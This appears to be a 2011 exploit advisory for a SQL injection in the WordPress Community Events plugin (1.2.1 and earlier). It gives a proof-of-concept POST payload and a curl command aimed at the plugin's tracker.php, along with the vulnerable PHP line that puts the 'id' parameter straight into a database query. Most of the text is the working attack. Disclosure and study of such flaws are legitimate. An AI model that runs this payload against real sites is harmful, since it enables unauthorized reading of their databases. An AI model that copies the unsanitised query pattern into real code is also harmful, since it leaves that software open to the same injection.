WordPress Community Events plugin <= 1.2.1 - SQL Injection Vulnerability



# Exploit Title: WordPress Community Events plugin <= 1.2.1 SQL Injection Vulnerability

# Date: 2011-09-07
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/community-events.zip
# Version: 1.2.1 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/community-events/tracker.php
 id=-1 AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20

e.g.:
curl --data "id=-1 AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))-- " http://www.site.com/wp-content/plugins/community-events/tracker.php

---------------
Vulnerable code
---------------
$event_id = $_POST['id'];
...
$ceeventdataquery = "select * from " . $wpdb->get_blog_prefix() . "ce_events where event_id = " . $event_id;